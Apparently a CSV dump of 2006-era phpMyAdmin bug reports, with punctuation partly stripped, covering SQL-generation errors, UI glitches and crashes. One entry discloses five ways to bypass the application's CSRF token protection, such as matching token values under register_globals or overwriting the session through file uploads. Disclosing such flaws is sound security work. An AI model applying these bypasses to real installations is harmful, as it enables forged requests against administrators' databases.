so this is the exported sql ALTER TABLE `content types has distributors` ADD CONSTRAINT `content types has distributors ibfk 1` FOREIGN KEY `content type id`) REFERENCES `content types` `content type id`) ON DELETE CASCADE ON UPDATE CASCADE, ALTER TABLE `content types has distributors` ADD CONSTRAINT `content types has distributors ibfk 1` FOREIGN KEY `content type id`) REFERENCES `content types` `content type id`) ON DELETE CASCADE ON UPDATE CASCADE, ADD CONSTRAINT `content types has distributors ibfk 2` FOREIGN KEY `distributor id`) REFERENCES `distributors` `distributor id`) ON DELETE CASCADE ON UPDATE CASCADE; 1\.
two ALTER TABLE queries connected with a comma 2\.
second ALTER TABLE query is actually the same as first, plus the query for the second foreign key without the first ALTER TABLE query, it obviously works.
Original URL https sourceforge.net p phpmyadmin bugs 2237 https sourceforge.net p phpmyadmin bugs 2237 Original author shylauda69 Found in version 2.9.0","bug"
"24444","8602","XML Export Is not suitable for view with Internet Explorer.
This may be a Internet Explorer bug more than anything, but the XML generation doesn t encode foreign characters adequately for display on Internet Explorer.. Take for example a M dash xe2x80x93), Internet Explorer will choke on this.
I use firefox too, but Firefox has some problems navigating XML files then minute you use a right click, it collapses to XML non view mode, this may be because I m using firefox 1.07 .
I m slow to upgrade..
Original URL https sourceforge.net p phpmyadmin bugs 2238 https sourceforge.net p phpmyadmin bugs 2238 Original author rofthorax Found in version 2.8.0.4","bug"
"24444","8603","Error when duplicating table with AUTO INCREMENT field.
Simple table with auto increment ID field.
Try to duplicate it and the SQL statement created by phpMyAdmin is missing a space between the AUTO INCREMENT = xxx and DEFAULT CHARSET clauses Error SQL query Edit CREATE TABLE `wonkyall kalido`.`em2sfid2` `ID` int 11 ) NOT NULL AUTO INCREMENT , `email` varchar 255 ) default NULL , `sfid` varchar 50 ) default NULL , `ignore` tinyint 1 ) NOT NULL default 0 , PRIMARY KEY `ID` ) , UNIQUE KEY `email` `email` ) ) ENGINE = MYISAM AUTO INCREMENT = 465DEFAULT CHARSET = latin1 MySQL said Documentation 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 465DEFAULT CHARSET = latin1 at line 6 Original URL https sourceforge.net p phpmyadmin bugs 2239 https sourceforge.net p phpmyadmin bugs 2239 Original author ssteiner Found in version 2.8.0.2","bug"
"24444","8604","phpMyAdmin and magic quotes runtime.
I noticed that on my system php4 ver 4.4 phpMyAdmin ver.
2.8.2.4) if I enable magic quotes runtime I get the 1045 Access denied for user root localhost Using password NO) message.
If confirmed, maybe the documentation should include a suggestion that the user should set magic quotes runtime = Off in their php.ini if they get this message while they do have a proper config.inc.php with the password set.
Original URL https sourceforge.net p phpmyadmin bugs 2240 https sourceforge.net p phpmyadmin bugs 2240 Original author thanos7 Found in version 2.8.2.4","bug"
"24444","8605","PHP included in Excel export output.
Line 56 in libraries export htmlexcel.php includes the PHP could that should have produced the charset in the HTML output.
Line 47 in libraries export htmlword.php does the correct thing.
Original URL https sourceforge.net p phpmyadmin bugs 2241 https sourceforge.net p phpmyadmin bugs 2241 Original author bjornjohansen Found in version 2.8.2.4","bug"
"24444","8606","Bottom column summaries are not lining up.
Easy one here.
On the database summary screen, notice the columns on the bottom of the list.
The Size column summary on the bottom is empty.
Actually the Size summary appears under the Overhead column.
And the column summary for Overhead appears to the right of the column.
Thanks!
Original URL https sourceforge.net p phpmyadmin bugs 2242 https sourceforge.net p phpmyadmin bugs 2242 Original author markpmw Found in version Latest Git","bug"
"24444","8607","Export default parameter broken sql drop table).
The export default parameter cfg[ Export ][ sql drop table ] = true; stopped working in versions 2.9.0 x.
This is caused by the lines 63 64 plugin list[ sql ][ options ][] = array type = gt; bool , name = gt; drop , text = gt; sprintf GLOBALS[ strAddClause ], drop clause)); in libraries export sql.php version 2.64, which uses the name drop instead of drop table .
The configuration setting cfg[ Export ][ sql drop ] = true; works instead of the above.
Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin bugs 2243 https sourceforge.net p phpmyadmin bugs 2243 Original author bjornth Found in version 2.9.0 rc1","bug"
"24444","8608","Problems copying tables.
Tried to copy a table from on database to another.
phpMyAdmin generates following statement CREATE TABLE `test`.`copying` `id` int 11 ) NOT NULL AUTO INCREMENT , PRIMARY KEY `id` ) ) ENGINE = MYISAM AUTO INCREMENT = 6478DEFAULT CHARSET = utf8 instead of CREATE TABLE `test`.`copying` `id` int 11 ) NOT NULL AUTO INCREMENT , PRIMARY KEY `id` ) ) ENGINE = MYISAM AUTO INCREMENT = 6478 DEFAULT CHARSET = utf8 So such statements fails.
I m using phpMyAdmin 2.8.2 Debian 0.1 Maybe it s fixed in later versions, didn t check it.
Original URL https sourceforge.net p phpmyadmin bugs 2244 https sourceforge.net p phpmyadmin bugs 2244 Original author antikbuch24","bug"
"24444","8609","Drop down menus in structure edit.
I use Mozilla 1.7.13 in Linux.
When i go to table structure editing all drow down menus field type, parameters, etc) are acting weird.
Clicking on them shows up the options, but moving the cursor hides them.
Only way to make selections is using keyboard arrows.
Looks like javascript onmouseover , onmouseout problem.
Original URL https sourceforge.net p phpmyadmin bugs 2245 https sourceforge.net p phpmyadmin bugs 2245 Original author mikk l Found in version 2.9.0 rc1","bug"
"24444","8610","sql compatibility mode on export ignored.
It seems something is broken as the output of exporting an entire database with the mysql compatibility options always produces output equal to when NONE is selected on the menu.
I confirmed this by attempting to export with compatibility settings for mysql323 and mysql40 and diffing the files which were all equal and not able to import to mysql 4.0).
Upon reverting to phpMyAdmin 2.8.2.4 the issue was gone.
I have not testing with rc1, but since I see no mention of this in the release notes I m guessing it s still broken.
Original URL https sourceforge.net p phpmyadmin bugs 2246 https sourceforge.net p phpmyadmin bugs 2246 Original author dasil003 Found in version 2.9.0 beta1","bug"
"24444","8611","After renaming a table the nav.
does not work.
If I go to the operation tab in a table and rename the table, the tabs still contain the old table name after the information is posted.
Original URL https sourceforge.net p phpmyadmin bugs 2247 https sourceforge.net p phpmyadmin bugs 2247 Original author cogo Found in version 2.9.0 rc1","bug"
"24444","8612","Error on Operations Copy table to.
When I try to copy a table, I get the following error output CREATE TABLE `db0002`.`usertest01` `Id` int 11 ) NOT NULL AUTO INCREMENT , [more fields here] PRIMARY KEY `Id` ) , KEY `I01SurnameName` `Surname` , `Name` ) ) ENGINE = MYISAM AUTO INCREMENT = 3019DEFAULT CHARSET = latin1 note there is a space missing between 3019 and DEFAULT.
If I copy the query in an SQL panel and add the missing space, all works well.
Original URL https sourceforge.net p phpmyadmin bugs 2248 https sourceforge.net p phpmyadmin bugs 2248 Original author claud1o Found in version 2.8.2.4","bug"
"24444","8613","Error on Operations Copy table to.
When I try to copy a table, I get the following error output CREATE TABLE `db0002`.`usertest01` `Id` int 11 ) NOT NULL AUTO INCREMENT , [more fields here] PRIMARY KEY `Id` ) , KEY `I01SurnameName` `Surname` , `Name` ) ) ENGINE = MYISAM AUTO INCREMENT = 3019DEFAULT CHARSET = latin1 note there is a space missing between 3019 and DEFAULT.
If I copy the query in an SQL panel and add the missing space, all works well.
Original URL https sourceforge.net p phpmyadmin bugs 2249 https sourceforge.net p phpmyadmin bugs 2249 Original author claud1o Found in version 2.8.2.4","bug"
"24444","8614","no colored Pointer in IE Naviframe original theme).
IE 6?)
Naviframe doesn t show Pointer cause IE6 only obeyes hover in conjunction with links) how i did solve it, you can see in trk themes Grid already reported in August, see http sourceforge.net tracker index.php?func=detail aid=1535169 group id=23067 atid=377410 ) Original URL https sourceforge.net p phpmyadmin bugs 2250 https sourceforge.net p phpmyadmin bugs 2250 Original author windkiel Found in version 2.9.0 rc1","bug"
"24444","8615","Segmentation fault when exporting db structure.
Server info OS Linux Debian 2.4.27 2 386 PHP 4.4.2 1.1 MySQL 4.1.14 6 Apache 2.0.54 5 What Segmentation fault When exporting any table structure Why It seems to be an error using the mysql unbuffered query ) PHP function.
For example, in file libraries export sql.php , at line 246, there is a query with the unbuffered flag on, but later line 247) the script only calls the fetch function once, there is the problem From php.net ...) You also have to fetch all result rows from an unbuffered SQL query, before you can send a new SQL query to MySQL So, if you only call the fetch function once, there might be other rows waiting to be fetched, and when you do another query, causes a segmentation fault i think).
I ve added this line just after line 247 while PMA DBI fetch row result)); this code fetch all the rows and now every works fine.
mysql unbuffered query ) doc http www.php.net manual en function.mysql unbuffered query.php Original URL https sourceforge.net p phpmyadmin bugs 2251 https sourceforge.net p phpmyadmin bugs 2251 Original author chaq Found in version 2.9.0.1","bug"
"24444","8616","Wrong application octetstream download behaviou.
The help does say Displays a link to download the binary data of the field.
You can use the first option to specify the filename, or use the second option as the name of a field which contains the filename.
However second option is used as index to row which is not assiociative array due to another bugs this caused) but only numerically indexed.
We should either fix documentation or preffered) add code which will convert field name to index.
Original URL https sourceforge.net p phpmyadmin bugs 2252 https sourceforge.net p phpmyadmin bugs 2252 Original author nijel Found in version 2.9.0","bug"
"24444","8617","font even uglier than in 2.8.x original theme).
Font in 2.8.x was too big, but in this release it is even worse.
PMA uses default system font, which on Windows machines using IE 6.0 is Times New Roman.
Take a look at attached screenshot.
Most of people I know still uses 2.7.x or even 2.6.x because PMA interface drastically degraded in past releases.
Original URL https sourceforge.net p phpmyadmin bugs 2253 https sourceforge.net p phpmyadmin bugs 2253 Original author corn kid","bug"
"24444","8618","Opera Selection in HTMLTables.
Theres a problem with selection in Opera.
If you have a result in a HTML table and you select a text in a cell and leave that cell, the selection goes away.
To copy the text you have to mousedown until you pressed ctrl c. if you mouseup before, ctrl c wont work Original URL https sourceforge.net p phpmyadmin bugs 2256 https sourceforge.net p phpmyadmin bugs 2256 Original author flakus Found in version 2.9.0","bug"
"24444","8619","left menu scrollbar always visible.
Left menu scrollbar is always visible in 2.9.0.
It was ok back in old versions.
Using IE 6.0 on Windows XP Original URL https sourceforge.net p phpmyadmin bugs 2254 https sourceforge.net p phpmyadmin bugs 2254 Original author corn kid Found in version 2.9.0","bug"
"24444","8620","Bypassing CSRF protection.
From Stefan Esser in common.lib.php there is the following code that is supposed to protect agains cross site request forgeries... if !isset REQUEST[ token ]) || SESSION[ PMA token ] != REQUEST[ token ]) \{ List of parameters which are allowed from unsafe source allow list = array db , table , lang , server , convcharset , collation connection , target , Session ID phpMyAdmin , Cookie preferences pma lang , pma charset , pma collation connection , pma convcharset , Possible login form pma servername , pma username , pma password , ); keys = array keys REQUEST); Remove any non allowed stuff from requests foreach keys as key) \{ if !in array key, allow list)) \{ unset REQUEST[ key]); unset GET[ key]); unset POST[ key]); unset GLOBALS[ key]); \} else \{ allowed stuff could be compromised so escape it REQUEST[ key] = htmlspecialchars REQUEST[ key], ENT QUOTES); \} \} \} Unfortunately this code can be bypassed by several simple techniques 1) Security relies on unset ) in older PHP versions unset ) can be bypassed with numerical keys 2) When register globals=On PMA Token and SESSION[PMA Token] are the same variable.
One can simply set PMA Token=XXXX and token=XXXX in the URL and bypass the protection 3) Uploading a file to the variable SESSION will overwrite the SESSION which leaves SESSION[PMA Token] empty... Of course it is simple to set token=[empty] 4) By sending a POST variable with the name HTTP SESSION VARS it is also possible to bypass 5) By uploading a file to the variable HTTP SESSION VARS the same can be done... By choosing any of the 5 ways an attacker can perform Cross Site Request Forgery attacks against phpMyAdmin.
Luckily some of the attacks will be catched by Suhosin http www.suhosin.org) by default Yours, Stefan Esser Hardened PHP Project Original URL https sourceforge.net p phpmyadmin bugs 2255 https sourceforge.net p phpmyadmin bugs 2255 Original author lem9","bug"
"24444","8621","automated timestamp values.
MySQL 5.1 should be the same for 4.1 and 5.0) CREATE TABLE `lawsuit` `id` bigint 20) unsigned NOT NULL AUTO INCREMENT, `reference` varchar 20) COLLATE latin1 german1 ci NOT NULL, `created` timestamp NULL DEFAULT NULL, `closed` datetime NOT NULL DEFAULT 0000 00 00 00 00 00 , `changed` timestamp NOT NULL DEFAULT 0000 00 00 00 00 00 ON UPDATE CURRENT TIMESTAMP, `filing` varchar 50) COLLATE latin1 german1 ci NOT NULL, PRIMARY KEY `id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1 german1 ci AUTO INCREMENT=4 ; add some rows, now edit one of this rows phpMyAdmin will also by default overwrite the `created`, and `changed` if you just enter something into `reference` But `created` and `changed` should not be included in generated SQL at all.
Original URL https sourceforge.net p phpmyadmin bugs 2257 https sourceforge.net p phpmyadmin bugs 2257 Original author cybot tm Found in version Latest Git","bug"
"24444","8622","add field in create table dialog unneeded check.
open create table dialog try to add more fields = execution denied caused by empty form this check is not required if somebody just wants to add more fields Original URL https sourceforge.net p phpmyadmin bugs 2258 https sourceforge.net p phpmyadmin bugs 2258 Original author cybot tm Found in version Latest Git","bug"
"24444","8623","undefined index.
Notice Undefined index host in libraries\header.inc.php on line 176 Original URL https sourceforge.net p phpmyadmin bugs 2259 https sourceforge.net p phpmyadmin bugs 2259 Original author cybot tm Found in version Latest Git","bug"
"24444","8624","Typo in libraries database interface lib.php.
Hi!
In libraries database interface lib.php on line 148, the require once ) call for the iconv wrapper has a typo in the pathname require once .
liraries iconv wrapper.lib.php ); This should read require once .
libraries iconv wrapper.lib.php ); Otherwise one gets Warning require once .
liraries iconv wrapper.lib.php) failed to open stream No such file or directory in apache htdocs hotel phpMyAdmin 2.9.0 libraries database interface.lib.php on line 148 Fatal error require once ) Failed opening required .
liraries iconv wrapper.lib.php include path= .
apache php lib php ) in apache htdocs hotel phpMyAdmin 2.9.0 libraries database interface.lib.php on line 148 ...when e.g.
trying to delete a table anything which goes through the iconv wrapper).
Best regards, Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin bugs 2260 https sourceforge.net p phpmyadmin bugs 2260 Original author bwiberg Found in version 2.9.0","bug"
"24444","8625","Link Create PHP Code .
MySQL client version 5.0.22 Strict mode) Used PHP extensions mysql PHP 5.1.5 PHPMyAdmin 2.9.0 and 2.9.0 beta1 lt; tested on) PMA = PHPMyAdmin When a user is created in the Privileges part, and when you then click on Create PHP Code it gives an error, so it looks like its trying to do the query again, and is not trying to create PHP code.
Hmmm, when I tried some more Create PHP Code, it always tries to execute the SQL, maybe it only me, but its really strange.
So for me to reproduce this is do a normal action and then click on the Create PHP Code link.
Original URL https sourceforge.net p phpmyadmin bugs 2261 https sourceforge.net p phpmyadmin bugs 2261 Original author animatrix84 Found in version 2.9.0","bug"
"24444","8626","Renaming database with VIEWs.
MySQL client version 5.0.22 Strict mode) Used PHP extensions mysql PHP 5.1.5 PHPMyAdmin 2.9.0 and 2.9.0 beta1 lt; tested on) PMA = PHPMyAdmin When renaming a Database, PMA tries to DROP a view with a DROP TABLE query SQL query Edit DROP TABLE `helpdesk`.`ict sts view` MySQL said Documentation 1051 Unknown table ict sts view Original URL https sourceforge.net p phpmyadmin bugs 2262 https sourceforge.net p phpmyadmin bugs 2262 Original author animatrix84 Found in version 2.9.0","bug"
"24444","8627","Syntax highlighter extra spaces.
MySQL client version 5.0.22 Strict mode) Used PHP extensions mysql PHP 5.1.5 PHPMyAdmin 2.9.0 and 2.9.0 beta1 lt; tested on) PMA = PHPMyAdmin When a user is created in the Privileges part, and when you then just copy the displayed query PMA used and when you then try to use this query in a SQL exec part of PMA it gives an error.
It fails because there is a space between the and , see other bug in the PMA displayed SQL code PMA does execute the query ok when adding a user, so the SQL in the background is OK, but what PMA is displaying what it used to create is wrong, the space) The same problem you have when you DROP a user, and maybe when you grant, change or maybe all actions with a user.
CREATE USER lala IDENTIFIED BY ; GRANT USAGE ON .
TO lala IDENTIFIED BY WITH MAX QUERIES PER HOUR 0 MAX CONNECTIONS PER HOUR 0 MAX UPDATES PER HOUR 0 MAX USER CONNECTIONS 0 ; AND MAYBE ALL OTHER USERS DROP USER lala ; Original URL https sourceforge.net p phpmyadmin bugs 2263 https sourceforge.net p phpmyadmin bugs 2263 Original author animatrix84 Found in version 2.9.0","bug"
"24444","8628","bug in Table.class.php.
if you have a db `Test` with any table and a db `test` with no table which is default in many distributions) you get Fatal error Using this when not in object context in srv http pma.cihar.com STABLE libraries Table.class.php on line 139 if you choose `test` in Navi frame or invoke index.php?db=test) Original URL https sourceforge.net p phpmyadmin bugs 2264 https sourceforge.net p phpmyadmin bugs 2264 Original author windkiel Found in version 2.9.0","bug"
"24444","8629","Unsetting variables causes segfault.
Hi!
With 2.9.0.1, one of the security fixes in libraries common.lib.php appears to generate a segmentation fault on our servers.
We re using PHP 5.1.5 on AIX 5.2.
The offending row 2721) unset key); It appears that once the loop through the get defined vars ) enumeration hits the variable key , the unset ) call tries unsetting key, that is key , which is what it s currently looking at in the foreach ) loop, and it apparently dislikes that.
Some debug output might look like this Begin unsetting keys... 8 lt; Checking if key GLOBALS is in variables whitelist array...
Checking if key ENV is in variables whitelist array...
Checking if key HTTP ENV VARS is in variables whitelist array...
It is not, so unsetting key HTTP ENV VARS ...
Checking if key POST is in variables whitelist array...
Checking if key HTTP POST VARS is in variables whitelist array...
It is not, so unsetting key HTTP POST VARS ...
Checking if key GET is in variables whitelist array...
Checking if key HTTP GET VARS is in variables whitelist array...
It is not, so unsetting key HTTP GET VARS ...
Checking if key COOKIE is in variables whitelist array...
Checking if key HTTP COOKIE VARS is in variables whitelist array...
It is not, so unsetting key HTTP COOKIE VARS ...
Checking if key SERVER is in variables whitelist array...
Checking if key HTTP SERVER VARS is in variables whitelist array...
It is not, so unsetting key HTTP SERVER VARS ...
Checking if key FILES is in variables whitelist array...
Checking if key HTTP POST FILES is in variables whitelist array...
It is not, so unsetting key HTTP POST FILES ...
Checking if key REQUEST is in variables whitelist array...
Checking if key dummy is in variables whitelist array...
It is not, so unsetting key dummy ...
Checking if key key is in variables whitelist array...
It is not, so unsetting key key ... gt;8 segfault) 8 lt; gdb httpd .
core GNU gdb 5.0 aix51 020209 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB.
Type show warranty for details.
This GDB was configured as powerpc ibm aix5.2.0.0 ...
Core was generated by `httpd .
Program terminated with signal 11, Segmentation fault.
bt full 0 0x10032bd4 in sig coredump sig=11) at mpm common.c 1050 1050 mpm common.c No such file or directory.
gdb) bt full 0 0x10032bd4 in sig coredump sig=11) at mpm common.c 1050 No locals.
1 0xffffffff in ?? )
from unknown load module) No symbol table info available.
gdb) quit gt;8 The reference to mpm common.c is Apache s handling of the process segfaulting.
Adding the line key , ...to the variables whitelist array seems to solve the problem.
Maybe there are other variables that should be included in the whitelist, too?
Of course this extension of the whitelist has to be thoroughly evaluated security wise before pushing it into the code.
Best regards, Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin bugs 2265 https sourceforge.net p phpmyadmin bugs 2265 Original author bwiberg Found in version 2.9.0.2","bug"
"24444","8630","Strict Errors with tbl alter.php.
at the top of tbl atler.php there is this code Id tbl alter.php,v 2.30 2006 02 21 11 07 44 cybot tm Exp vim expandtab sw=4 ts=4 sts=4 require once .
libraries Table.class.php ; Gets some core libraries require once .
libraries common.lib.php ); which causing strict errors on PHP5 with strict mode enabled becuase common.lib.php should be the first file included in the file not Table.class.php It should be like this.
Id tbl alter.php,v 2.30 2006 02 21 11 07 44 cybot tm Exp vim expandtab sw=4 ts=4 sts=4 Gets some core libraries require once .
libraries common.lib.php ); require once .
libraries Table.class.php ; Original URL https sourceforge.net p phpmyadmin bugs 2266 https sourceforge.net p phpmyadmin bugs 2266 Original author sidhighwind Found in version 2.9.0.1","bug"
"24444","8631","Setup script doesn t work.
With phpMyAdmin 2.9.0.1, I am unable to use the setup script http XXX phpmyadmin scripts setup.php).
I can view the front page for the script, that has the global action buttons, but clicking any of the buttons e.g.
Add in the Servers section) just reloads the page.
I m getting errors like this in my Apache error log PHP Notice Undefined index PMA token in D \\Program Files\\Apache Group\\Apache2\\htdocs\\phpmyadmin\\scripts\\setup.php on line 319, referer http jigsaw adtest phpmyadmin scripts setup.php The same error is also recorded for line 345.
The problem seems to be that in setup.php the key used for the token is PMA token , but everywhere else it s PMA token with a space either side).
Adding a space either side of PMA token in setup.php there are 15 occurrences) seems to fix the problem.
Original URL https sourceforge.net p phpmyadmin bugs 2267 https sourceforge.net p phpmyadmin bugs 2267 Original author richfearn Found in version 2.9.0.1","bug"
"24444","8632","wrong sql syntax displayed.
if you grant some privileges server privileges.php) the resulting page displays illegal sql code GRANT USAGE ON .
TO tmp WITH... cut paste will fail) only if you click on [edit] you get the correct syntax GRANT USAGE ON .
TO tmp WITH ... here a space before WITH would be better readable though) Original URL https sourceforge.net p phpmyadmin bugs 2268 https sourceforge.net p phpmyadmin bugs 2268 Original author windkiel Found in version 2.9.0","bug"
"24444","8633","Parse Error in file lang english utf 8.inc.php .
Line 975 in file lang english utf 8.inc.php reads ` strZip = zipped ; lled the necessary PHP extensions as described in the sdocumentation s. ;` I don t know if something else was supposed to be there or even if the error happened during the FTP transfer, but there you have it. )
I circumvented it by commenting out the stuff after ` strZip = zipped ;` Original URL https sourceforge.net p phpmyadmin bugs 2269 https sourceforge.net p phpmyadmin bugs 2269 Original author egingell Found in version 2.9.0.2","bug"
"24444","8634","Wrong analyzing of CREATE TABLE with CHAR field.
Test SQL is ===================== CREATE TABLE test table uid mediumint 8) unsigned NOT NULL default 0 , ip char 15) NOT NULL default , dateline int 10) unsigned NOT NULL default 0 , errorcount tinyint 1) NOT NULL default 0 , domain varchar 32) NOT NULL default bbs ) TYPE=MyISAM ===================== After parse , ip char 15) is ipchar 15 ).
MySQL Parse v 2.50.2.1 dig from phpMyAdmin 2.9.0) select sql for test) report bug) Time DelayParseTime =0.035987AnalyzeTime =0.002741FormatHtmlTime =0.003661 Format SQL CREATE TABLE test table uid mediumint 8 ) unsigned NOT NULL default 0 , ipchar 15 ) NOT NULL default , dateline int 10 ) unsigned NOT NULL default 0 , errorcount tinyint 1 ) NOT NULL default 0 , domain varchar 32 ) NOT NULL default bbs ) TYPE = MyISAM Parse InfoArray [raw] = gt; CREATE TABLE test table uid mediumint 8) unsigned NOT NULL default 0 , ip char 15) NOT NULL default , dateline int 10) unsigned NOT NULL default 0 , errorcount tinyint 1) NOT NULL default 0 , domain varchar 32) NOT NULL default bbs ) TYPE=MyISAM [0] = gt; Array [type] = gt; alpha reservedWord [data] = gt; CREATE [forbidden] = gt; 1 ) [1] = gt; Array [type] = gt; alpha reservedWord [data] = gt; TABLE [forbidden] = gt; 1 ) [2] = gt; Array [type] = gt; alpha identifier [data] = gt; test table [forbidden] = gt; ) [3] = gt; Array [type] = gt; punct bracket open round [data] = gt; ) [4] = gt; Array [type] = gt; white newline [data] = gt; ) [5] = gt; Array [type] = gt; alpha identifier [data] = gt; uid [forbidden] = gt; ) [6] = gt; Array [type] = gt; alpha columnType [data] = gt; mediumint [forbidden] = gt; ) [7] = gt; Array [type] = gt; punct bracket open round [data] = gt; ) [8] = gt; Array [type] = gt; digit integer [data] = gt; 8 ) [9] = gt; Array [type] = gt; punct bracket close round [data] = gt; ) ) [10] = gt; Array [type] = gt; alpha columnAttrib [data] = gt; unsigned [forbidden] = gt; ) [11] = gt; Array [type] = gt; alpha reservedWord [data] = gt; NOT [forbidden] = gt; 1 ) [12] = gt; Array [type] = gt; alpha reservedWord [data] = gt; NULL [forbidden] = gt; 1 ) [13] = gt; Array [type] = gt; alpha columnAttrib [data] = gt; default [forbidden] = gt; ) [14] = gt; Array [type] = gt; quote single [data] = gt; 0 ) [15] = gt; Array [type] = gt; punct listsep [data] = gt; , ) [16] = gt; Array [type] = gt; white newline [data] = gt; ) [17] = gt; Array [type] = gt; alpha identifier [data] = gt; ip [forbidden] = gt; ) [18] = gt; Array [type] = gt; alpha functionName [data] = gt; char [forbidden] = gt; ) [19] = gt; Array [type] = gt; punct bracket open round [data] = gt; ) [20] = gt; Array [type] = gt; digit integer [data] = gt; 15 ) [21] = gt; Array [type] = gt; punct bracket close round [data] = gt; ) ) [22] = gt; Array [type] = gt; alpha reservedWord [data] = gt; NOT [forbidden] = gt; 1 ) [23] = gt; Array [type] = gt; alpha reservedWord [data] = gt; NULL [forbidden] = gt; 1 ) [24] = gt; Array [type] = gt; alpha columnAttrib [data] = gt; default [forbidden] = gt; ) [25] = gt; Array [type] = gt; quote single [data] = gt; ) [26] = gt; Array [type] = gt; punct listsep [data] = gt; , ) [27] = gt; Array [type] = gt; white newline [data] = gt; ) [28] = gt; Array [type] = gt; alpha identifier [data] = gt; dateline [forbidden] = gt; ) [29] = gt; Array [type] = gt; alpha columnType [data] = gt; int [forbidden] = gt; ) [30] = gt; Array [type] = gt; punct bracket open round [data] = gt; ) [31] = gt; Array [type] = gt; digit integer [data] = gt; 10 ) [32] = gt; Array [type] = gt; punct bracket close round [data] = gt; ) ) [33] = gt; Array [type] = gt; alpha columnAttrib [data] = gt; unsigned [forbidden] = gt; ) [34] = gt; Array [type] = gt; alpha reservedWord [data] = gt; NOT [forbidden] = gt; 1 ) [35] = gt; Array [type] = gt; alpha reservedWord [data] = gt; NULL [forbidden] = gt; 1 ) [36] = gt; Array [type] = gt; alpha columnAttrib [data] = gt; default [forbidden] = gt; ) [37] = gt; Array [type] = gt; quote single [data] = gt; 0 ) [38] = gt; Array [type] = gt; punct listsep [data] = gt; , ) [39] = gt; Array [type] = gt; white newline [data] = gt; ) [40] = gt; Array [type] = gt; alpha identifier [data] = gt; errorcount [forbidden] = gt; ) [41] = gt; Array [type] = gt; alpha columnType [data] = gt; tinyint [forbidden] = gt; ) [42] = gt; Array [type] = gt; punct bracket open round [data] = gt; ) [43] = gt; Array [type] = gt; digit integer [data] = gt; 1 ) [44] = gt; Array [type] = gt; punct bracket close round [data] = gt; ) ) [45] = gt; Array [type] = gt; alpha reservedWord [data] = gt; NOT [forbidden] = gt; 1 ) [46] = gt; Array [type] = gt; alpha reservedWord [data] = gt; NULL [forbidden] = gt; 1 ) [47] = gt; Array [type] = gt; alpha columnAttrib [data] = gt; default [forbidden] = gt; ) [48] = gt; Array [type] = gt; quote single [data] = gt; 0 ) [49] = gt; Array [type] = gt; punct listsep [data] = gt; , ) [50] = gt; Array [type] = gt; white newline [data] = gt; ) [51] = gt; Array [type] = gt; alpha identifier [data] = gt; domain [forbidden] = gt; ) [52] = gt; Array [type] = gt; alpha columnType [data] = gt; varchar [forbidden] = gt; ) [53] = gt; Array [type] = gt; punct bracket open round [data] = gt; ) [54] = gt; Array [type] = gt; digit integer [data] = gt; 32 ) [55] = gt; Array [type] = gt; punct bracket close round [data] = gt; ) ) [56] = gt; Array [type] = gt; alpha reservedWord [data] = gt; NOT [forbidden] = gt; 1 ) [57] = gt; Array [type] = gt; alpha reservedWord [data] = gt; NULL [forbidden] = gt; 1 ) [58] = gt; Array [type] = gt; alpha columnAttrib [data] = gt; default [forbidden] = gt; ) [59] = gt; Array [type] = gt; quote single [data] = gt; bbs ) [60] = gt; Array [type] = gt; white newline [data] = gt; ) [61] = gt; Array [type] = gt; punct bracket close round [data] = gt; ) ) [62] = gt; Array [type] = gt; alpha reservedWord [data] = gt; TYPE [forbidden] = gt; 1 ) [63] = gt; Array [type] = gt; punct [data] = gt; = ) [64] = gt; Array [type] = gt; alpha reservedWord [data] = gt; MyISAM [forbidden] = gt; ) [len] = gt; 65 ) Analyze InfoArray [0] = gt; Array [querytype] = gt; CREATE [select expr clause] = gt; [position of first select] = gt; [from clause] = gt; [group by clause] = gt; [order by clause] = gt; [having clause] = gt; [where clause] = gt; [where clause identifiers] = gt; Array ) [unsorted query] = gt; [queryflags] = gt; Array ) [select expr] = gt; Array ) [table ref] = gt; Array ) [foreign keys] = gt; Array ) [create table fields] = gt; Array [uid] = gt; Array [timestamp not null] = gt; [type] = gt; MEDIUMINT ) [ip] = gt; Array [timestamp not null] = gt; [type] = gt; CHAR ) [dateline] = gt; Array [timestamp not null] = gt; [type] = gt; INT ) [errorcount] = gt; Array [timestamp not null] = gt; [type] = gt; TINYINT ) [domain] = gt; Array [timestamp not null] = gt; [type] = gt; VARCHAR ) ) ) ) Original URL https sourceforge.net p phpmyadmin bugs 2270 https sourceforge.net p phpmyadmin bugs 2270 Original author honestqiao Found in version 2.9.0.2","bug"
"24444","8635","PHP Notice on Import of empty file from uploaddir.
selected an empty file 0 byte) from cfg[ UploadDir ] Notice Uninitialized string offset 0 in C \htdocs\phpMyAdmin\libraries\import.lib.php on line 49 Der Import wurde erfolgreich abgeschlossen, 0 Abfragen wurden ausgefxc3xbchrt.
Impport was successful, 0 query executed.
Original URL https sourceforge.net p phpmyadmin bugs 2271 https sourceforge.net p phpmyadmin bugs 2271 Original author cybot tm Found in version Latest Git","bug"
"24444","8636","ON DUPLICATE KEY UPDATE not coloured correctly.
I have a query like INSERT INTO `login` `member id`, `address`, `count`, `update date`) VALUES 2, 2, 1, NOW )) ON DUPLICATE KEY UPDATE `count` = `count` 1, `update date` = NOW ) It gets basically coloured the right way, except that DUPLICATE is not recognised as part of the statement keywords .
Tested in 2.8.2.4 and on http pma.cihar.com trunk config index.php at 2006 10 12.
Original URL https sourceforge.net p phpmyadmin bugs 2272 https sourceforge.net p phpmyadmin bugs 2272 Original author ci dev Found in version Latest Git snapshot","bug"
"24444","8637","Total line shows Collation, Type which isn t useful.
Hello!
This is a very minor issue, but when viewing the list of tables in a database, the bottom row has various totals , which include a total for the Type and Collation columns.
E.g.
this 12 table s) Sum 56 MyISAM latin1 swedish ci 34.4 KiB 0 B These two totals MyISAM and latin1 swedish ci are not meaningful.
phpMyAdmin 2.9.0.2, PHP 4.4.4, MySQL 5.0.24a Thanks.
Original URL https sourceforge.net p phpmyadmin bugs 2273 https sourceforge.net p phpmyadmin bugs 2273 Original author kink","bug"
"24444","8638","setting column to auto increment fails badly generated SQL).
